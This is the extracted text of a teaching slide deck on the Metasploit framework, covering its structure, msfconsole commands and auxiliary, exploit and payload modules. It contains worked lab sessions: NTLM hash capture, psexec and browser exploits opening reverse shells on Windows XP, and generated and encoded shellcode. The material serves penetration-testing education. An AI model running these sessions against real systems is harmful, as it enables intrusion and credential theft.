Metasploit

Alexandre Gagne & Andres Meija

1

Outline

2

● Introduction● Usage

○ Demographics○ Scenarios

● Fundamentals○ Structure & architecture○ Msfconsole

● Workflow○ Auxiliary module○ Exploit module○ Payload module○ Post module

● Conclusion

Introduction

3

Overview

4

History

5

Editions

6

Maintenance

7https://blog.rapid7.com/tag/vulnerability-management/ https://blog.rapid7.com/tag/metasploit/

Usage

8

Demographics

9

Summary

10

Top industries

11

Top countries

12

Distribution of companies (by employee)

13

Distribution of companies (by revenue)

14

Use cases

15

Pentesting16

Hacking17

Forensics18

Education19

Fundamentals

20

Structure & architecture

21

Structure

22

Top level directory (/usr/share/metasploit-framework )

kali@kali:~# ls /usr/share/metasploit-framework/data/cpuinfo ipwn meterpreter snmp webcameicar.com isight.bundle mime.yml sounds wmapeicar.txt john.conf msfcrawler SqlClrPayload wordlistsemailer_config.yaml lab passivex templatesexploits logos php vncdll.x64.dllflash_detector markdown_doc post vncdll.x86.dll

23

StructureData directory (msf/data)

kali@kali:~# ls /usr/share/metasploit-framework/documentation/changelog.Debian.gz CONTRIBUTING.md.gz developers_guide.pdf.gz README.mdCODE_OF_CONDUCT.md copyright modules

Documentation directory (msf/documentation )

kali@kali:~# ls /usr/share/metasploit-framework/lib/anemone msfenv.rb rbmysql.rb sqlmapanemone.rb net rex tasksenumerable.rb postgres rex.rb telephonymetasm postgres_msf.rb robots.rb telephony.rbmetasploit rabal snmp windows_console_color_support.rbmsf rbmysql snmp.rb

Lib directory (msf/lib)

kali@kali:~# ls /usr/share/metasploit-framework/plugins/aggregator.rb ips_filter.rb openvas.rb sounds.rbalias.rb komand.rb pcap_log.rb sqlmap.rbauto_add_route.rb lab.rb request.rb thread.rbbeholder.rb libnotify.rb rssfeed.rb token_adduser.rbdb_credcollect.rb msfd.rb sample.rb token_hunter.rbdb_tracker.rb msgrpc.rb session_notifier.rb wiki.rbevent_tester.rb nessus.rb session_tagger.rb wmap.rbffautoregen.rb nexpose.rb socket_logger.rb

24

StructurePlugins directory (msf/plugins )

kali@kali:~# ls /usr/share/metasploit-framework/scripts/meterpreter ps resource shell

Scripts directory (msf/scripts )

kali@kali:~# ls /usr/share/metasploit-framework/tools/context dev exploit hardware memdump modules password recon

Tools directory (msf/tools)

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary encoders exploits nops payloads post

25

StructureModules directory (msf/modules )

Load modules at runtime

kali@kali:~# msfconsole -m ~/secret-modules/

Load modules after msfconsole is running

msf6 > loadpathUsage: loadpath </path/to/modules>

Loads modules from the given directory which should contain subdirectories formodule types, e.g. /path/to/modules/exploits

26

Architecture

Msfconsole

27

Overview

28

kali@kali:# msfconsole

kali@kali:~# msfconsole -h

msf6 > help

Getting command help

Getting usage help

Launching the msfconsole

Commandsmsf6 > help

Core Commands=============

Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host debug Display information useful for debugging exit Exit the console features Display the list of not yet released features that can be opted in to get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history load Load a framework plugin quit Exit the console repeat Repeat a list of commands route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads tips Show a list of useful productivity tips unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers

29

Module Commands===============

Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context clearm Clear the module stack info Displays information about one or more modules listm List the module stack loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Interact with a module by name or search term/index

Developer Commands==================

Command Description ------- ----------- edit Edit the current module or a file with the preferred editor irb Open an interactive Ruby shell in the current context log Display framework.log paged to the end if possible pry Open the Pry debugger on the current module or Framework reload_lib Reload Ruby library files from specified paths

info command

30

msf6 > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index Version: 14774 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good

Provided by: Laurent Gaffie <laurent.gaffie@gmail.com> hdm <hdm@metasploit.com> sf <stephen_fewer@harmonysecurity.com>

Available targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload information: Space: 1024

Description: This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.

References: http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103 http://www.securityfocus.com/bid/36299 http://www.osvdb.org/57799 http://seclists.org/fulldisclosure/2009/Sep/0039.html http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf6 > info -hUsage: info <module name> [mod2 mod3 ...]

Options:* The flag '-j' will print the data in json format* The flag '-d' will show the markdown version with a browser. More info, but could be slow.Queries the supplied module or modules for information. If no module is given,show info for the currently active module.

Module ranking

31

search command

32

msf6 > help searchUsage: search [keywords]

Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name platform : Modules affecting this platform ref : Modules with a matching ref type : Modules of a specific type (exploit, auxiliary, or post)

msf6 > search cve:2011 author:jduck platform:linux

Matching Modules================

Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow

Can query search with specific keywords

Can query search with multiple keywords

msf6 > search CVE:2011-0404

Matching Modules================

# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow

use/back commands

33

msf6 > use ms09_050_smb2_negotiate_func_index msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >

use sets context to a specific module

msf6 > use payload/windows/shell_bind_tcpmsf6 payload(windows/shell_bind_tcp) >

msf6 > use auxiliary/scanner/portscan/tcpmsf6 auxiliary(scanner/portscan/tcp) >

use resets contextmsf6 payload(windows/shell_bind_tcp) > backmsf6 >

msf6 auxiliary(scanner/portscan/tcp) > backmsf6 >

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > backmsf6 >

show command (out of module)

34

msf6 > show

Encoders========

Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder...

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show -h[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

show command (in module)

35

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads===================

Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline

...

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port (TCP) WAIT 180 yes The number of seconds to wait for the attack to complete.

Exploit target:

Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf6 > use ms09_050_smb2_negotiate_func_index msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >

set gets new options after use

New options include show targets , show payloads , show options , ...

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show -h[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

set/unset/setg/unsetg commands

36

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134RHOST => 172.16.194.134

umsf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > unset RHOSTUnsetting RHOST…

msf6 > setg WAIT 2WAIT => 2

msf6 > unsetg WAITUnsetting WAIT…

set sets a parameter locally setg sets a parameter globally

unsetg resets a set parameter globallyunset resets a set parameter locally

msf6 > saveSaved configuration to: /home/kali/.msf4/config

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > unset allFlushing datastore...

unset all resets all set parameter locally save saves the current environment and settings

Common parameters

37

● Payload type○ Command - payload that executes a command remotely○ Meterpreter - payload that provides a command line remotely (meterpreter shell)

● Connection type○ Auto - switches between bind and reverse automatically○ Bind - uses a bind connection○ Reverse - uses a reverse connection

● LHOST - address of local host● LPORT - ports of local host (for reverse connections)● RHOST - address of target● RPORT - ports of target● Target settings - specifies target OS and version● Exploit timeout - defines timeout time for exploit, in minutes

Workflow

38

Overview

39

Auxiliary module

40

Overview

41

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/admin2wire atg chromecast dns firetv kerberos misc mssql netbios oracle sap smb tftp vmware webminandroid aws db2 edirectory hp ldap motorola mysql networking pop2 scada sunrpc tikiwiki vnc wemoappletv backupexec dcerpc emc http maxdb ms natpmp officescan postgres serverprotect teradata upnp vxworks zend

Types

● Admin● Scanner● Server

Scanner auxiliary modules

Admin auxiliary modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanneracpp dcerpc emc h323 jenkins misc mssql nfs pop3 rdp scada ssl ubiquiti voiceafp dect etcd http kademlia mongodb mysql nntp portmap redis sip steam udp vxworksbackdoor discovery finger ike llmnr motorola natpmp ntp portscan rogue smb telephony upnp winrmchargen dlsw ftp imap lotus mqtt nessus openvas postgres rservices smtp telnet varnish wproxycouchdb dns gopher ip mdns msf netbios oracle printer rsync snmp teradata vmware wsdddb2 elasticsearch gprs ipmi memcached msmail nexpose pcanywhere quake sap ssh tftp vnc x11

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/serverandroid_browsable_msf_launch.rb dhcp.rb jsse_skiptls_mitm_proxy.rb pxeexploit.rb webkit_xslt_dropper.rbandroid_mercury_parseuri.rb dns local_hwbridge.rb regsvr32_command_delivery_server.rb wget_symlink_file_write.rbbrowser_autopwn2.rb fakedns.rb ms15_134_mcl_leak.rb socks_proxy.rb wpad.rbbrowser_autopwn.rb ftp.rb netbios_spoof_nat.rb socks_unc.rbcapture http_ntlmrelay.rb openssl_altchainsforgery_mitm_proxy.rb teamviewer_uri_smb_redirect.rbdhclient_bash_env.rb icmp_exfil.rb openssl_heartbeat_client_memory.rb tftp.rb

Server auxiliary modules

Structure

42

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliaryadmin bnat cloud docx example.py fileformat gather pdf server spoof voipanalyze client crawler dos example.rb fuzzers parser scanner sniffer sqli vsploit

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanneracpp dns ike misc netbios portscan scada teradata winrmafp elasticsearch imap mongodb nexpose postgres sip tftp wproxybackdoor emc ip motorola nfs printer smb ubiquiti wsddchargen etcd ipmi mqtt nntp quake smtp udp x11couchdb finger jenkins msf ntp rdp snmp upnpdb2 ftp kademlia msmail openvas redis ssh varnishdcerpc gopher llmnr mssql oracle rogue ssl vmwaredect gprs lotus mysql pcanywhere rservices steam vncdiscovery h323 mdns natpmp pop3 rsync telephony voicedlsw http memcached nessus portmap sap telnet vxworks

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/sshe_karaf_command_execution.rb fortinet_backdoor.rb ssh_enum_git_keys.rb ssh_login.rbcerberus_sftp_enumusers.rb juniper_backdoor.rb ssh_enumusers.rb ssh_version.rbdetect_kippo.rb karaf_login.rb ssh_identify_pubkeys.rbeaton_xpert_backdoor.rb libssh_auth_bypass.rb ssh_login_pubkey.rb

Auxiliary type (modules/auxiliary )

Tool (modules/auxiliary/*/* )

Tool type (modules/auxiliary/*/* )

Commands

43

msf6 > use /scanner/afp/afp_loginmsf6 auxiliary(scanner/afp/afp_login) > help

...Auxiliary Commands==================

Command Description ------- ----------- check Check to see if a target is vulnerable exploit This is an alias for the run command rcheck Reloads the module and checks if the target is vulnerable recheck This is an alias for the rcheck command reload Reloads the auxiliary module rerun Reloads and launches the auxiliary module rexploit This is an alias for the rerun command run Launches the auxiliary module

Using an auxiliary module adds new auxiliary-specific commands

Example (admin auxiliary)

44

msf6 > use auxiliary/admin/vmware/poweron_vm msf6 auxiliary(poweron_vm) > run

[+] VM Powered On Successfully[*] Auxiliary module execution completed

msf6 auxiliary(poweron_vm) > set RHOST 192.168.1.100RHOST => 192.168.1.100msf6 auxiliary(poweron_vm) > set RPORT 443RPORT => 443msf6 auxiliary(poweron_vm) > set VM XPSP3CloneMEVM => XPSP3CloneMemsf6 auxiliary(poweron_vm) >set USERNAME rootUSERNAME => rootmsf6 auxiliary(poweron_vm) > set PASSWORD passwordPASSWORD => password

1. Pick the module

2. Set the module parameters

3. Run the module

Example (scanner auxiliary)

45

msf6 > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(anonymous) > run

[*] 192.168.1.222:21 Anonymous READ (220 mailman FTP server (Version wu-2.6.2-5) ready.)[*] 192.168.1.205:21 Anonymous READ (220 oracle2 Microsoft FTP Service (Version 5.0).)[*] 192.168.1.215:21 Anonymous READ (220 (vsFTPd 1.1.3))[*] 192.168.1.203:21 Anonymous READ/WRITE (220 Microsoft FTP Service)[*] 192.168.1.227:21 Anonymous READ (220 srv2 Microsoft FTP Service (Version 5.0).)[*] 192.168.1.204:21 Anonymous READ/WRITE (220 Microsoft FTP Service)[*] Scanned 27 of 55 hosts (049% complete)[*] Scanned 51 of 55 hosts (092% complete)[*] Scanned 52 of 55 hosts (094% complete)[*] Scanned 53 of 55 hosts (096% complete)[*] Scanned 54 of 55 hosts (098% complete)[*] Scanned 55 of 55 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(anonymous) > set RHOSTS 192.168.1.200-254RHOST => 192.168.1.200-254msf6 auxiliary(anonymous) > set THREADS 55THREADS => 55

1. Pick the module

2. Set the module parameters

3. Run the module

Example (server auxiliary)

46

msf6 > use auxiliary/server/capture/smb msf6 auxiliary(anonymous) > run[*] Auxiliary module execution completed

[*] Server started.msf auxiliary(smb) > [*] Mon Mar 28 10:21:56 -0600 2011NTLMv1 Response Captured from 192.168.1.195:2111 V-MAC-XP\Administrator OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1LMHASH:397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25 NTHASH:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b

msf6 auxiliary(anonymous) > jobs -l

Jobs====

Id Name -- ---- 2 Auxiliary: server/capture/smb

msf auxiliary(smb) > kill 2Stopping job: 2...

[*] Server stopped.

msf6 auxiliary(smb) > set JOHNPWFILE /tmp/john.txtJOHNPWFILE => /tmp/john.txt

1. Pick the module

2. Set the module parameters

3. Run the module

Demo47

Exploit module

48

Overview

49

Types

● Active● Passive

Active exploits1. Exploit a specific host2. Run until completion3. Exit

Passive exploits1. Wait for incoming hosts2. Exploit them as they connect

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/windows/smbgeneric_smb_dll_injection.rb ms06_025_rasmans_reg.rb ms09_050_smb2_negotiate_func_index.rb psexec.rbgroup_policy_startup.rb ms06_025_rras.rb ms10_046_shortcut_icon_dllloader.rb smb_delivery.rbipass_pipe_exec.rb ms06_040_netapi.rb ms10_061_spoolss.rb smb_doublepulsar_rce.rbms03_049_netapi.rb ms06_066_nwapi.rb ms15_020_shortcut_icon_dllloader.rb smb_relay.rbms04_007_killbill.rb ms06_066_nwwks.rb ms17_010_eternalblue.rb timbuktu_plughntcommand_bof.rbms04_011_lsass.rb ms06_070_wkssvc.rb ms17_010_eternalblue_win8.py webexec.rbms04_031_netdde.rb ms07_029_msdns_zonename.rb ms17_010_psexec.rbms05_039_pnp.rb ms08_067_netapi.rb netidentity_xtierrpcpipe.rb

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/windows/browseradobe_cooltype_sing.rb hp_loadrunner_writefilestring.rb ms13_055_canchor.rbadobe_flash_avm2.rb hpmqc_progcolor.rb ms13_059_cflatmarkuppointer.rbadobe_flash_casi32_int_overflow.rb hyleos_chemviewx_activex.rb ms13_069_caret.rbadobe_flash_copy_pixels_to_byte_array.rb ibmegath_getxmlvalue.rb ms13_080_cdisplaypointer.rbadobe_flash_domain_memory_uaf.rb ibmlotusdomino_dwa_uploadmodule.rb ms13_090_cardspacesigninhelper.rbadobe_flash_filters_type_confusion.rb ibm_spss_c1sizer.rb ...

Active exploit modules

Passive exploit modules

Structure

50

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploitsaix apple_ios bsdi example_linux_priv_esc.rb example.rb firefox hpux linux android bsd dialup example.py example_webapp.rb freebsd irix mainframe

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/linuxantivirus ftp http imap misc pop3 pptp redis smtp ssh upnpbrowser games ids local mysql postgres proxy samba snmp telnet

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/linux/sshceragon_fibeair_known_privkey.rb quantum_dxi_known_privkey.rbcisco_ucs_scpuser.rb quantum_vmpro_backdoor.rbexagrid_known_privkey.rb solarwinds_lem_exec.rbf5_bigip_known_privkey.rb symantec_smg_ssh.rbibm_drm_a3user.rb vmware_vdp_known_privkey.rbloadbalancerorg_enterprise_known_privkey.rb vyos_restricted_shell_privesc.rbmercurial_ssh_exec.rb

Operating system (modules/exploits )

Tool type (modules/exploits/* )

Tool (modules/exploits/*/* )

Commands

51

msf6 > use ms09_050_smb2_negotiate_func_indexmsf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > help

...Exploit Commands================

Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable recheck Alias for rcheck reload Just reloads the module rerun Alias for rexploit rexploit Reloads the module and launches an exploit attempt run Alias for exploit

Using an exploit module adds new exploit-specific commandsmsf6 exploit(ms08_067_netapi) > exploit -j[*] Exploit running as background job.msf exploit(ms08_067_netapi) >

msf6 exploit(ani_loadimage_chunksize) > sessions -l

Active sessions=============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1[*] Starting interaction with 1...

meterpreter >

Can list shells with -lCan control shells with -i #

Can run in background with -j

Example (active exploit)

52

msf6 > use exploit/windows/smb/psexec msf6 exploit(psexec) > exploit

[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'victim'...[*] Uploading payload...[*] Created \hikmEeEM.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting \hikmEeEM.exe...[*] Sending stage (240 bytes)[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

msf6 exploit(psexec) > set RHOST 192.168.1.100RHOST => 192.168.1.100msf6 exploit(psexec) > set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcpmsf6 exploit(psexec) > set LHOST 192.168.1.5LHOST => 192.168.1.5msf6 exploit(psexec) > set LPORT 4444LPORT => 4444msf6 exploit(psexec) > set SMBUSER victimSMBUSER => victimmsf6 exploit(psexec) > set SMBPASS s3cr3tSMBPASS => s3cr3t

1. Pick the module

2. Set the module parameters

3. Run the module

Example (passive exploit)

53

msf6 > use exploit/windows/browser/ani_loadimage_chunksize

msf6 exploit(ani_loadimage_chunksize) > set URIPATH /URIPATH => /msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcpmsf6 exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5LHOST => 192.168.1.5msf6 exploit(ani_loadimage_chunksize) > set LPORT 4444LPORT => 4444

msf6 exploit(ani_loadimage_chunksize) > exploit[*] Exploit running as background job.

[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.5:8080/[*] Server started.

msf6 exploit(ani_loadimage_chunksize) >[*] Attempting to exploit ani_loadimage_chunksize[*] Sending HTML page to 192.168.1.100:1077...[*] Attempting to exploit ani_loadimage_chunksize[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...[*] Sending stage (240 bytes)[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf6 exploit(ani_loadimage_chunksize) > sessions -i 2[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

1. Pick the module

2. Set the module parameters

3. Run the module

5. Exploit them as they connect

4. Wait for incoming hosts

Demo54

Payload module

55

Overview

56msf6 payload(windows/shell_bind_tcp) > msf6 payload(windows/shell/bind_tcp) >

Types

● Single○ Self-contained○ Standalone

Stager (bind_tcp) and stage (shell)Single payload (no stage)

● Stager○ Setup network connection○ Small and reliable○ Can use multiple similar stagers

● Stage● Payload components● Downloaded by stagers● Provide advanced features

Structure

57

kali@kali:~# ls /usr/share/metasploit-framework/modules/payloadsingles stagers stages

kali@kali:~# ls /usr/share/metasploit-framework/modules/payload/singlesaix apple_ios bsdi firefox java mainframe osx python ruby ttyandroid bsd cmd generic linux nodejs php r solaris windows

kali@kali:~# ls /usr/share/metasploit-framework/modules/payload/singles/windowsadduser.rb meterpreter_bind_tcp.rb powershell_bind_tcp.rbdns_txt_query_exec.rb meterpreter_reverse_http.rb powershell_reverse_tcp.rbdownload_exec.rb meterpreter_reverse_https.rb shell_bind_tcp.rbencrypted_shell_reverse_tcp.rb meterpreter_reverse_ipv6_tcp.rb shell_bind_tcp_xpfw.rbexec.rb meterpreter_reverse_tcp.rb shell_hidden_bind_tcp.rbformat_all_drives.rb metsvc_bind_tcp.rb shell_reverse_tcp.rbloadlibrary.rb metsvc_reverse_tcp.rb speak_pwned.rbmessagebox.rb pingback_bind_tcp.rb x64meterpreter_bind_named_pipe.rb pingback_reverse_tcp.rb

Payload type (modules/payload )

Operating system (modules/payload/* )

Payload (modules/payload/*/* )

Commands

58

msf6 > use payload/windows/shell_bind_tcpmsf6 payload(windows/shell_bind_tcp) > help

...Payload Commands================

Command Description ------- ----------- check Check to see if a target is vulnerable generate Generates a payload reload Reload the current module from disk to_handler Creates a handler with the specified payload

msf6 payload(windows/shell_bind_tcp) > generate -hUsage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

-E Force encoding -O <opt> Deprecated: alias for the '-o' option -P <opt> Total desired payload size, auto-produce appropriate NOP sled length -S <opt> The new section name to use when generating (large) Windows binaries -b <opt> The list of characters to avoid example: '\x00\xff' -e <opt> The encoder to use -f <opt> Output format: base32,base64,bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war -h Show this message -i <opt> The number of times to encode the payload -k Preserve the template behavior and inject the payload as a new thread -n <opt> Prepend a nopsled of [length] size on to the payload -o <opt> The output file name (otherwise stdout) -p <opt> The platform of the payload -v Verbose output (display stage in addition to stager) -x <opt> Specify a custom executable file to use as a template

Using a payload module adds new payload-specific commands

Example (generate payload)

59

msf6 payload(windows/shell_bind_tcp) > generate# windows/shell_bind_tcp - 328 bytes# https://metasploit.com/# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +...

Generated payload

Example (generate payload with disallowed bytes)

60

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'# windows/shell_bind_tcp - 355 bytes# https://metasploit.com/# Encoder: x86/shikata_ga_nai# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xda\xdc\xd9\x74\x24\xf4\xbe\xca\xaa\xca\x1e\x5f\x2b\xc9" +"\xb1\x53\x31\x77\x17\x83\xc7\x04\x03\xbd\xb9\x28\xeb\xbd" +"\x56\x2e\x14\x3d\xa7\x4f\x9c\xd8\x96\x4f\xfa\xa9\x89\x7f" +"\x88\xff\x25\x0b\xdc\xeb\xbe\x79\xc9\x1c\x76\x37\x2f\x13" +...

msf6 payload(windows/shell_bind_tcp) > generate# windows/shell_bind_tcp - 328 bytes# https://metasploit.com/# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +...

Generated payload Generated payload with disallowed bytes

Example (generate payload with specific encoder)

61

msf6 payload(windows/shell_bind_tcp) > generate -e x86/nonalpha# windows/shell_bind_tcp - 470 bytes# https://metasploit.com/# Encoder: x86/nonalpha# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +...

msf6 payload(windows/shell_bind_tcp) > generate# windows/shell_bind_tcp - 328 bytes# https://metasploit.com/# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +...

msf6 payload(windows/shell_bind_tcp) > show encoders

Encoders========

# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- ... 36 x86/nonalpha low No Non-Alpha Encoder 37 x86/nonupper low No Non-Upper Encoder 38 x86/opt_sub manual No Sub Encoder

(optimised) 39 x86/service manual No Register Service 40 x86/shikata_ga_nai excellent No Polymorphic XOR

Additive Feedback Encoder

Encoders for specific payload

Generated payloadGenerated payload with specific encoder

Example (generate payload with multiple passes)

62

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'# windows/shell_bind_tcp - 355 bytes# https://metasploit.com/# Encoder: x86/shikata_ga_nai# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xd9\xce\xd9\x74\x24\xf4\xb8\xf4\xee\x6b\x7f\x5a\x2b\xc9" +"\xb1\x53\x83\xea\xfc\x31\x42\x13\x03\xb6\xfd\x89\x8a\xca" +"\xea\xcc\x75\x32\xeb\xb0\xfc\xd7\xda\xf0\x9b\x9c\x4d\xc1" +"\xe8\xf0\x61\xaa\xbd\xe0\xf2\xde\x69\x07\xb2\x55\x4c\x26" +...

Generated payload

